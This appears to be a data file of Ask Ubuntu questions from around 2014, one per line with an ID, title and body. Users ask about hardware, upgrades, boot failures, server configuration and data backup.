503548	no cursor with logitech mouse with unifying receiver	just got ubuntu 12.04 installed and then did the ~520 updates . afterwards i did an upgrade to 14.04 . through this process my logitech mouse/keyboard worked . this is a logitech tv730 . after the upgrade , my mouse stopped working , likely the keyboard portion of it too . my current work around is what strikes me as odd . if i plug in my mionix naos 7200 . my only usb mouse laying around , the cursor appears and my logitech mouse/keyboard starts working . it looks like it needs to initialize a mouse in order to work and mine is n't cutting it .
503553	installing ns2 in ubuntu 14.04	i am new to ubuntu , and i was trying to install ns2 . ns2 has been successfully installed and while installing nam , i got a segmentation fault : segmentation fault ( core dumped ) by following some of the instructions in the internet , i am not getting that error and at the same time i am not installed with nam also . when i try to run nam in the terminal , i am not at all directed to it . should i uninstall that and install it again ? if so , how can i do it ?
503555	how to block a command from terminal ?	i do n't want any users in my machine to use a command in my machine other than root user . the command is given below . `` sudo -e su '' for security reasons
503558	i ca n't run application/x-executable files in ubuntu 14.04	i 'm having problems with some application/x-executable files . they simply do n't open . i 've tried to click , i 've tried open it on terminal , but nothing happens . on ubuntu 12.04 both of the programs work , just double-clicking it . the programs are : fez ( setup of fez game ; humble bundle edition ) supermeatboy ( setup of the game ; humble bundle edition ) fusion ( executable file of the emulator kega fusion ) i 've already installed the 32-bit libs ( fusion needs it ) . i 've tried on terminal : ./fez just return : bash : ./fez : no such file or directory sorry if i wrote something wrong or dumb . i 'm brazilian and i 'm not so good at english .
503559	how to expand eclipse editor switcher ?	i am running eclipse kepler on ubuntu 12.04 . when i have some source files open in the editor , i can hit ctrl+e to obtain a drop down menu to switch between open files . as you can see , the menu is truncated and does not show all the available files . i can not highlight the little box to expand it using the mouse . is there a way to set the size another way ( through config files , maybe ) ?
503563	cleaning up old hwe stacks ?	i 've been running 12.04 since release and have updated to every new hwe stack . i am currently on 12.04.4 . does anyone know how to clean out all the old versions of hwe ? i currently have way too many kernels on my laptop , which becomes a pain when dkms starts rebuilding modules . if anyone has any advise , that would be greatly appreciated . kind regards , michael
503564	how to access the internet on 64 bit ubuntu through wine ?	i have ubuntu 14.04 installed , and wine 1.6 . i downloaded wine to be able to run ytd ( youtube download manager ) , an application meant for windows . sadly , it tells me that there is no internet connection , but on the wine official site it says that it is supported and fully functional . i need a workaround for this please .
503567	dot does n't recognize any formats	my installation of graphviz 2.36.0-0ubuntu3 does n't seem to support any output formats : $ dot -tpng format : `` png '' not recognized . use one of : $ dot -tsvg format : `` svg '' not recognized . use one of : i.o.w. , the list of output formats is simply empty . do i need to install some extra packages ? the package does n't recommend or suggest anything that looks like support for additional formats .
503569	not able to get 2g ( edge ) network in ubuntu 14.04lts	i am using huawei e1732 data card . its working well if 3g service of an operator is available . but if i change the operator whose 3g network is not avalable then the modem is not working and i am not able to connect to the internet . even when i try to scan the available network with modem manager then it shows only available 3g ( hspa/umts ) networks . inspite of having more edge networks available in my area .
503571	how to put separated values together ?	i would like to ask since i 'm new to this environment on how i will going to make those separated values as one value together ? for example : 38734 34 3542 232 where i want 38734 and 34 to be 3873434 and 3542 and 232 becomes 354232 . is there any generic command so that i can apply to whatever values i will consolidated ?
503572	no wifi connectivity in ubuntu 14.04	i am using ubuntu 14.04 on asus f551ca-sx290h . and bulit in qualcomm atheros wifi adapter . i tried steps following answers in askubuntu but still no solution .
503575	ubuntu-files become read only in production.app down	i am a newbie and i had posted a question on stackoverflow and i got a satisfactory answer.now the site is back online . the issue was that the files such as thin.log and all the app files had become read only.because of this my website went down.the following is the question . http : //stackoverflow.com/questions/24979638/rails-thin-server-stopped-on-productionlive-mode-website-down now i want to find the exact reason as to why this has happened.i tried to read syslog and dmesg but did not find anything suspicious . i just dont want the same kind of issue to repeat again .
503582	ubuntu 12.04 vs ubuntu 14.04	on ubuntu 12.04 lts , i installed virtualbox ( last version ) where i am running ubuntu 12.04 lts and ubuntu 14.04 lts . i noticed a significant difference in terms of performance : mainly , the speed . all the tasks i run on ubuntu 12.04 are faster . i want to do most of my daily work on ubuntu 14.04 but every task seem slower . i tried them on vmware player but the difference is still the same . why this difference ?
503583	i dont know what does sudo su bash mean	i want to run amun honeypot on ubuntu 13.10 and i sometimes have problem with running this honeypot . i just write this command $ sudo ./amun_server.py & but it cant work sometimes.i want to try this command sudo su bash but i dont know what this command can do .
503585	lts auto upgrade to 14.04.1	when will auto upgrade to 14.04.1 be available from the software updater ? many thanks .
503586	system failed to boot after upgradng eol ubuntu 13.10 to 14.04	today i upgraded my eol ( end of life ) system ubuntu 13.10 to 14.04 . it downloaded 738 mb . then while upgrading or installing , it messaged something like this : `` finishing the installation ( & stopping to install further ) as many errors are detected . press 'enter ' to continue '' i pressed 'enter ' key . then immediately the ' $ ' ( prompt ) returned back . i confirmed that the system was upgraded to ubuntu 14.04 . then the system failed to reboot . i checked before rebooting that 'print screen ' button was n't functioning . also while upgrading , i read at one point it was written that there is high possibility that the system would be broken . as the system failed to reboot , i installed back my previous distribution ubuntu 13.10 using bootable pen drive . please look below to know what all i did to upgrade : first i edited the /etc/apt/sources.lst file by replacing archive.ubuntu.com with old-releases.ubuntu.com then i ran : sudo apt-get update sudo apt-get dist-upgrade ( this command did n't do anything ; simply had output `` 0 upgraded , 0 installed ... ... ... . '' ) sudo do-release-upgrade then it downloaded 738 mb of data but the system could n't boot after the upgradation . having no other option , i reinstalled the previous distro ubuntu 13.10 . i feel the only solution left for me is to download the iso image of the new distro & install preparing bootable pen drive . also , i can not experiment upgrading many times as it will increase my monetary expense as each upgradation requires 738 mb of data to download . is it o.k . or any other way also ! !
503587	organize desktop by on nemo	i 'm using nemo for my folder manager and when i press the right mouse button the only option to sort my desktop by is by name . is it possible to sort by other things like date modified ?
503592	kernel debugging	i am trying to set a kernel debugging between 2 ubuntu machines , using a com port . it just does not work . i have tried to compile 3.15.6 kernel from kernel.org . can somebody please help me ? i am totally lost thanks
503593	how to solve the 'nodata ' ( does the network require authentication ? ) problem ?	this message shows up every time i try to update or upgrade from terminal . the full msg is : e : gpg error : http : //dl.google.com stable inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) how can i solve this ?
503596	7-22-14 update broke my 12.04lts	on 7-22-14 my 12.04lts update manager did a bunch of updates . it then came back and said something ( do n't remember ) was at end of life support and did i want to update ? i said yes and it updated a bunch of stuff . looking in history for software center it lists a bunch of saucy removals and trusty installs ( with precise in parentheses ) . the update manager then stalled when trying to shutdown the system for a reboot . i waited a long time , but had to hit the reset button . now the system gives a broken pipe error on boot . the version still lists 12.04lts , the radeon catalyst center is gone , fglrx is all gone , additional drivers finds nothing , and details says graphics unknown , experience standard . it works , but seems quite a bit slower . it gives a bunch of errors on shutdown ( ca n't be specific , they flash by too fast ) . since 14.04.1lts just came out was this a failed 14.04 upgrade ? is the easiest way to fix it doing a backup and then nuke it from orbit with a fresh install ? ( note : this is a wubi install which i did n't realize until later apparently is n't a `` real '' install , it just makes a virtual drive as a file under ntfs on windows . )
503600	how to install melpa in emacs	i need to install melpa into my emacs 23.3 version . i have googled for the ways to install it but could n't find/understand any of them . can anyone please help me with installing melpa . i am using ubuntu 12.04
503601	synergy setup problem	i have one desktop and one laptop at home and want to combine them using synergy . i followed the instructions https : //help.ubuntu.com/community/synergyhowto but failed to merge screens . the log says the server is waiting for clients , and my laptop failed to connect to the server with `` timed out '' error . both machines are on ubuntu 14.04.1 and the desktop is connected with wire and the laptop is using wireless . both connections come from the same home router . i tried quicksynergy as well but that did n't work either .
503604	usb peripherals cutting in and out	i keep having issues with all of my usb peripherals . the first issue is with my mouse , it jitters every now and again randomly , its a wireless logitech mouse and i have never had an issue on any other distro . the next is my logitech ue4500 wireless bluetooth headphones , which came with a usb adapter to use with computers , it detects the headphones fine , but every now and again the sound `` jitters '' much like the mouse , randomly . again i have no issues on any other distro or os . so i have put this down to a usb issue with ubuntu . i have googled for hours but can not seem to find anything close to my issue . i 'm running ubuntu 14.04 and update it constantly
503607	ubuntu on an android tablet ?	i know that ubuntu touch for tablets is still in development but how do people have it already installed , are these just dev builds ? they seem to work very well otherwise .
503608	problem to login after fresh install of ubuntu 14.04 server version	i have installed ubuntu 14.04 sever version properly and removed the pendrive when it was told to remove . but it does not shows up grub entry when system reboots . windows startups directly . it only shows up when i connect the bootable pendrive and restart . installation seems complete and i have login and done some commands . but sudo apt-get update is not working . how will grub entry come at the beginning without attaching the bootable pendrive ? mymain question is regarding the grub entry . and why without pendrive it is not starting . i have installed with the guided partioning method , using the free space in one of my drive . i alloted 20 gb space from one of my drives .
503609	vlc loses sound in ubuntu 14.04 after update playing ogg-files	updated to ubuntu 13.10 ubuntu 14.04 ( by choosing to install over the current ubuntu 13.10 dvd ) installed vlc ( not reset update script ) all the settings are saved ( from 13.10 ) but ... when playing .ogg-files the sound suddenly disappears , although the slider continues to creep . while manipulating the slider the sound is restored . in deriving window vlc-messages ( the analogue of the log file ) in mode 2 `` debug '' at the time of the termination of the sound appears only one line : pulse debug : underflow but the same line may appear at other times ( when the sound is not lost ) that 's like a piece of log normal playback ... ... qt4 debug : im : setting an input pulse debug : underflow pulse debug : underflow main debug : buffering 0 % main debug : buffering 0 % main debug : stream buffering done ( 352 ms in 0 ms ) main debug : end of audio preroll main debug : decoder buffering done in 0 ms pulse debug : underflow pulse debug : underflow main debug : buffering 0 % main debug : buffering 0 % main debug : end of audio preroll main debug : buffering 98 % main debug : stream buffering done ( 631 ms in 0 ms ) main debug : decoder buffering done in 0 ms pulse debug : underflow .. mute ... pulse debug : underflow reset settings to default - did not help in the previous 13.10 and 13.04 i did n't have this error .
503610	python-biom-format not installing	i am trying to install python-biom-format on virtual box . but i am getting error : e : unable to locate package python-biom-format how can i fix this problem ? i tried everything .
503612	just downloaded the nautilus source code , but some files seem to be missing	i just ran the command apt-get source nautilus and it saved the code in my home area . i have been looking through the files ( well , grepping ) and there are comments like this one ( takes from lines 3691 to 3693 , in file /po/en_gb.po : # : ../src/nautilus-places-sidebar.c:519 msgid `` recent files '' msgstr `` recent files '' that looks like it is referencing the file nautilus-places-sidebar.c in ../src ( so /src from the main dir with the source code it - nautilus-13.10.1 ) , but in nautilus-13.10.1/src there is no file nautilus-places-sidebar.c . why is this - am i interpreting the comment wrong or is the comment incorrect , or what ?
503614	downgrade from 14.04.4 to 14.04.1	so yesterday ( 2014-07-27 ) i upgraded my machines from ubuntu 12.04 to 14.04 , thinking the 14.04.1 point-release is out . sudo do-release-upgrade did n't show a new release so i did sudo do-release-upgrade -p now i found out , that this upgraded to 14.04.4 instead of 14.04.1 . my question : can i downgrade from 14.04.4 to 14.04.1 ( or 14.04 ) ? if yes , how do i do this ? update : i have updated 3 machines and i ca n't remember why i thought i had them upgraded to the no-yet-existing 14.04.4 lsb_release -a on all of them and they all report : no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty . sorry for wasting your time . : -/
503615	boot problem 12.04.4 lts	good morning to all . i can not make my system boot . i went into recovery mode and i always get the same message : the system is running in low graphics mode . your screen graphics card and input device settings could not be detected correctly . you need to configure these yourself . i press enter . next message : what you like to do ? 1 . run in low graphics for just one session 2 . reconfigure graphics 3 . troubleshoot the error 4 . exit to console login i choose option one next screen stand by for one minute while the display restarts i wait two or three or more minutes nothing happens . if i press ok , ubuntu 12.04.4 lts asks me to login . i put my password ( the one i use for installing apps ) and then it asks me for password , but i do not have a second password if i put the same or nothing out says login incorrect . and i am stuck . in addition i ran memory test start up test hard disc test everything is ok
503618	login as root on startup login prompt	i need to use the root account - i.e . log on as root from the start . i 'm not interested in sudo or getting temporary root privileges . and with the greatest of respect- please no warnings about root or it not being best practice ! i 've seen a few threads on this and the focus seems to be more about not using it rather than a clear set of instructions to enable the root account . every thing suggested does not work . i just need to be presented with a root account when i boot up my machine . i would therefore be grateful for a concise set of instructions without the string of dire warnings . it would be great to pin such a guide as there seems to be so many versions . thank you
503624	ubuntu 12.04 apache server error	i have ubuntu 12.04 with apache . the localhost was working fine . but today i wanted to setup a virtual host . after setting virtual host i just made restart server by doing this command sudo /etc/init.d/apache2 restart it showed me error like apache2 : syntax error on line 237 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/sites-enabled/testsite.com : no such file or directory action 'configtest ' failed . the apache error log may have more information . ... fail ! i do n't know whats the error i have tried to solve the error by going through google . but i ca n't solve this . here is the default file for apache2 configuration located in ( /etc/apache2/sites-available ) serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride all options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > now when i am opening localhost on my browser then it is showing oops ! google chrome could not connect to localhost
503627	ubuntu 14.04 ca n't boot	i get these errors during booting in ubuntu 14.04 : mount : mounting /dev/disk/ by-uuid /926b9e0e.. mount : mounting /dev/on /root/dev failed mount : mounting /sys on /root/sys failed mount : mounting /proc on /root/proc failed target file system does n't have requested /sbin/init . no init found . try passing init=bootarg busybox v1.21.1 ( ubuntu 1:1.21.0-1 ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs )
503628	can not load ubuntu desktop after installing nvidia driver	i 've just installed an nvidia driver for my ubuntu 14.04 32-bit . now i can not load my desktop , the screen breaks after the login screen . the only thing that works is the console terminal ( ctrl+alt+f1 ) . how can i fix this ? the nvidia installer did say something about backing up the previous state of some x server files . perhaps if i could revert from this backup that would work but i can not get to them .
503629	cant install 14.04 on pc	tried to install ubuntu 14.04 on my pc but the downloading program says my kernel is not i86 , mine is apparently only a i686 . please advise if i could use any other product .
503632	how to use ubuntu terminal to backup data over a shared netowrk drive	firstly , i must confess and say that i 'm very green in linux so kindly forgive me for my newbie question . secondly , forgive me again for the long post - i just had to be sure i got everything down . so i have a laptop that recently could n't boot via windows 7 os anymore . unfortunately , the machine contains gbs worth of data that i must backup to the office 's shared network drive before i can reinstall windows 7 a fresh again . therefore , i decided to use ubuntu live cd and run it through the `` try ubuntu without installing '' option to connect to the office 's wireless lan and then copy all the relevant folders that contain important data to the network drive . i could easily track down the folders/files that i needed from the windows source directory by starting from ubuntu 's devices section then navigating through this location : /media/windows7_os ( i assumed this is how ubuntu sees the drive c labeled with the same name ) . and then , i could just as easily find my network destination after successfully connecting to the wireless lan and finding it under ubuntu 's network section by navigating through this location : browse network > then opening the drive > nas-kkm ( ftp ) ( i picked ftp since i figured file transfer was my objective ) . after successfully logging into the file server , i simply tried copying and pasting my directories of interest from the source , to the destination - though unfortunately , i kept getting this error message almost immediately : error while copying `` .docx '' . there was an error copying the file into ftp : //nas-kkm.local/ ... error reading from file : permission denied so i tried finding an alternate way to my backing up problem , and i found a post that recommended i try using `` sudo cp '' to copy my files through the terminal . however , i still can not copy my files . i used this command : sudo cp /media/windows7_os/users/profile one/desktop ftp : //nas-kkm.local/myoffice/t430_laptop/profile % one/desktop notice i placed `` % '' in place of a space in one of the destination sub-directories since it seemed as though the command did n't want any spaces in my directories for the destination . unfortunately , this still did n't work . ( as you can see , i 'm trying to back up the entire desktop from the user `` profile one '' . ) the command can not find my destination directory - even when i tried renaming it without spaces . as i 'd mentioned earlier , i 've never used the terminal to run any commands before - this is my first time and i 'm only familiar with the ubuntu gui interface since it 's intuitive to use . any assistance will greatly be appreciated . kind regards , rama
503633	ubuntu server 14.04 vsftpd connection problem	i recently installed vsftpd according to this tutorial : http : //www.krizna.com/ubuntu/setup-ftp-server-on-ubuntu-14-04-vsftpd/ . i can login to the ftp but after that i get the following results from filezilla : answer : 230 login successful . commando : opts utf8 on answer : 200 always in utf8 mode . status : connected status : folder list commando : pwd answer : 257 `` / '' commando : type i answer : 200 switching to binary mode . commando : pasv answer : 227 entering passive mode ( 192,168,000,00,000,000 ) . ( i replaced the 0 's ) status : server generated a passive answer with an untracable address . uses the serveraddress instead commando : list error : connection lost error : receiving folder list failed ( i have translated the above ) in /etc/vsftpd.conf i have the following commented out lines : listen=yes anonymouse_enable=no local_enable=yes write_enable=yes local_unmask=022 dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes xferlog_file=/var/log/vsftpd.log chroot_local_user=yes ( line # 120 ) secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key allow_writeable_chroot=yes ssl_ciphers=high pasv_enable=yes pasv_max_port=40000 pasv_min_port=40100 i have also portforwarded the following ports to the server : 80 protocol both : tcp udp 21 protocol both : tcp udp 22 protocol both : tcp udp i also did 22 because i have installed openssh i hope someone could help me figure out why i get that error message . thanks in advance
503638	create virtual usb drive from partition to run live cd	i 'm trying to install android_x86 on a separate partition that was created before installing 14.04 . just for testing experimental reasons , i created a 32gig partition to use as a virtual usb per to say . following the instructions on android-x86 's porting faq , i dumped the iso on the 32gig drive by using : $ dd if=android-x86-4.4-rc2.iso of=/dev/sdx now i have opened my 40_custom and created my menuentry , but , what i am stuck on is exactly how would this be entered . for example , i know that it should be something like this : menuentry `` android-x86 '' { set root= ' ( hd0,1 ) ' chainloader +1 } since the iso was dumped to a hard drive partition and not a usb stick , it has to be on sda1 instead of sdb . when selecting the menuentry android-x8 on reboot , the message is , isolinux.bin was not found or is corrupted . tried , **linux /isolinux/isolinux.bin , but that gave the same message . so , exactly what would i place for an entry in the menuentry for it to work ?
503639	you do not have the permissions necessary to save the file	i am using ubuntu 14.04 . recently i have installed lamp server and also i tried to install word press . during this installation i am facing one severe problem that is suppose i have one text file in desktop . if i want to write something and want to save it tells that `` you do not have the permissions necessary to save the file . please check that you typed the location correctly and try again . '' if i want to delete something , there is no delete option is coming . if i want to trash any files or folder , no trash option is coming , move to trash is disabled . in browser if i want to save any you tube video , it tells `` the file could not be saved because you do not have the proper permissions . choose another save directory . '' if i right click on any folder , maximum properties are disabled except few . so , what i understand something permission related problem . i searched forums and tried many solutions but no success .
503640	using midi device ( roland td-15kv ) as output device for playing with music	i have a roland td-15kv connected using usb . ubuntu does recognize the device as an input and output which is good . the problem is that whenever i turn on the module and set the device as output ( so all my system sounds go to device along with music ) the module ( drum kit ) goes to a weird `` reading only '' mode . it does receive all my the audio from my system but i ca n't control the drum kit . and when disconnected the drum kit works fine . it does work fine under windows . thanks in advance . floris
503643	ubuntu live over pxe boot sets manual config for networking	i have setup a pxe boot system where one can boot an ubuntu live session over the network . booting and installation both work fine , with the installation able to access the network . within the live session , the default lan network interface is set to manual in /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet manual that would n't be a problem . the problem is that installed system also has this configuration , and since there 's an entry for eth0 ( or whatever the name of the interface happens to be ) in /etc/network/interfaces , networkmanager ignores it , leading users to think that their `` lan is n't working in ubuntu '' . there are plenty of things that ubuntu can copy over from a live session to an installation , such as packages , repository sources , gui preferences . it does n't do so for any of those . why , though , does it retain this network configuration , of all things ? how do i stop it from doing so ?
503644	my usb 3.0 port does n't work	something is very wrong with usb support on ubuntu . so , i have 2 usb 3.0 ports on the motherboard , along with 4 usb 2.0 ports and also 2 usb ports on my front panel . usb 3.0 is n't working and running lsusb and this is what happens : bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 005 : id 04a9:2676 canon , inc. capt device bus 001 device 008 : id 043e:70d7 lg electronics usa , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 003 : id 18c3:6255 bus 004 device 005 : id 04f3:0103 elan microelectronics corp. activejet k-2024 multimedia keyboard bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub how the hell is this even possible , i just switched from windows and i am starting to worry about driver compatiibility . perhaps this is something in the bios , but i do n't know . note : i do n't know if relevant , but it boots through efi ( which is a good thing , i hope ) . remark : previous ubuntu running on computer was either 13.04 or 12.10 and everything seemed normal then . i have tried plugging in my gamepad , keyboard and mouse . the ports seem to be powered though , i can charge my phone for example . as requested ( nothing plugged in ) : lspci : 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( external gfx0 port b ) ( rev 02 ) 00:02.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( pci express gpp port b ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.3 pci bridge : advanced micro devices , inc. [ amd/ati ] sb900 pci to pci bridge ( pcie port 3 ) 00:16.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 0 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 5 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] turks xt [ radeon hd 6670/7670 ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] turks/whistler hdmi audio [ radeon hd 6000 series ] 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) lsmod : module size used by xpad 18218 0 ff_memless 13573 1 xpad btrfs 835954 0 raid6_pq 97812 1 btrfs xor 21411 1 btrfs ufs 74890 0 qnx4 13317 0 hfsplus 107516 0 hfs 54677 0 minix 36140 0 ntfs 97369 0 msdos 17332 0 jfs 181348 0 xfs 912173 0 libcrc32c 12644 2 xfs , btrfs rfcomm 69160 0 bnep 19624 2 bluetooth 391196 10 bnep , rfcomm nls_iso8859_1 12713 2 snd_hda_codec_hdmi 46254 1 joydev 17381 0 keucr 72238 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo snd_usb_audio 153525 2 videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo snd_usbmidi_lib 29215 1 snd_usb_audio videodev 134688 2 uvcvideo , videobuf2_core usb_storage 62209 2 usblp 22891 0 kvm_amd 59987 0 kvm 451511 1 kvm_amd crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 aesni_intel 55624 0 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper snd_hda_codec_realtek 61438 1 snd_seq_midi 13324 0 serio_raw 13462 0 snd_seq_midi_event 14899 1 snd_seq_midi edac_core 62291 0 snd_hda_intel 52355 12 fam15h_power 13119 0 radeon 1522422 5 edac_mce_amd 22617 0 k10temp 13126 0 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_rawmidi 30144 2 snd_usbmidi_lib , snd_seq_midi snd_hwdep 13602 2 snd_usb_audio , snd_hda_codec snd_pcm 102099 5 snd_usb_audio , snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq sp5100_tco 13979 0 ttm 85115 1 radeon i2c_piix4 22155 0 drm_kms_helper 53081 1 radeon snd 69238 40 snd_hda_codec_realtek , snd_usb_audio , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_usbmidi_lib , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi drm 303102 7 ttm , drm_kms_helper , radeon i2c_algo_bit 13413 1 radeon soundcore 12680 1 snd mac_hid 13205 0 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52570 0 hid 106148 2 hid_generic , usbhid pata_acpi 13038 0 psmouse 106678 0 r8169 67581 0 mii 13934 1 r8169 ahci 25819 3 pata_atiixp 13271 0 libahci 32560 1 ahci
503648	how do i get a vistablet penpad to work with a wacom linux driver ? ( 14.04 )	how do i get a vistablet penpad to work with a wacom linux driver ? ( or any driver ) ( 14.04 ) i heard of other people who got it to work with the wacom linux driver , but i could n't get it to work myself . thanks
503649	how to download applications from ubuntu software center	i 've just installed ubuntu 13.10 , my very first linux desktop . i want to download and install an application ( vlc media player ) from the software center . when i clicked the download button , a pop-up asked me to : '' this link needs to be opened with an application '' it sounds strange to me and i do n't know what to do . could any guru tell me the proper way to get software online and install them .
503655	errors : dd_rescue : ( fatal ) spurious options : expansion / failed ! : no such file or directory ?	please , i would truly appreciate if you could help me in figuring this out : i 'm trying to save my data from one source ( memory stick / hard disk ) on to another and i have no clue why i 'm getting these errors ? here are the commands i used and the terminal output : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdf0c7b4b device boot start end blocks id system /dev/sda1 1 5 40131 de dell utility /dev/sda2 * 6 1918 15360000 7 hpfs/ntfs /dev/sda3 1918 19458 140888920 7 hpfs/ntfs disk /dev/sdc : 31.6 gb , 31608274944 bytes 64 heads , 32 sectors/track , 30144 cylinders units = cylinders of 2048 * 512 = 1048576 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table note : sector size is 4096 ( not 512 ) disk /dev/sdd : 3000.6 gb , 3000592977920 bytes 255 heads , 63 sectors/track , 45600 cylinders units = cylinders of 16065 * 4096 = 65802240 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x90b209a3 device boot start end blocks id system /dev/sdd1 * 1 45601 2930258388 7 hpfs/ntfs ubuntu @ ubuntu : ~ $ sudo dd_rescue /dev/sdc /dev/sdd1/image.dd dd_rescue : ( fatal ) : open `` /dev/sdd1/image.dd '' failed : not a directory ubuntu @ ubuntu : ~ $ mount aufs on / type aufs ( rw ) none on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) /dev/sda2 on /media/sda2 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda3 on /media/sda3 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sdd1 on /media/seagate expansion drive type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) 